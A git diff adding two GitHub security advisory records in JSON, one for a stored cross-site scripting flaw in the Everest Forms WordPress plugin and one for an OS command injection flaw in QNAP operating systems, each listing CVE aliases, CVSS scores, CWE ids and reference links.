diff --git a/advisories/unreviewed/2024/02/GHSA-xww7-5f37-vrcg/GHSA-xww7-5f37-vrcg.json b/advisories/unreviewed/2024/02/GHSA-xww7-5f37-vrcg/GHSA-xww7-5f37-vrcg.json
new file mode 100644
index 0000000000000..78868d2bbe827
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xww7-5f37-vrcg/GHSA-xww7-5f37-vrcg.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xww7-5f37-vrcg",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51695"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPEverest Everest Forms – Build Contact Forms, Surveys, Polls, Application Forms, and more with Ease! allows Stored XSS.This issue affects Everest Forms – Build Contact Forms, Surveys, Polls, Application Forms, and more with Ease!: from n/a through 2.0.4.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51695"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/everest-forms/wordpress-everest-forms-plugin-2-0-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-xxpm-69vv-79hr/GHSA-xxpm-69vv-79hr.json b/advisories/unreviewed/2024/02/GHSA-xxpm-69vv-79hr/GHSA-xxpm-69vv-79hr.json
new file mode 100644
index 0000000000000..7f25dc83b985f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-xxpm-69vv-79hr/GHSA-xxpm-69vv-79hr.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xxpm-69vv-79hr",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41282"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41282"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-53"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77",
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:49Z"
+ }
+}
\ No newline at end of file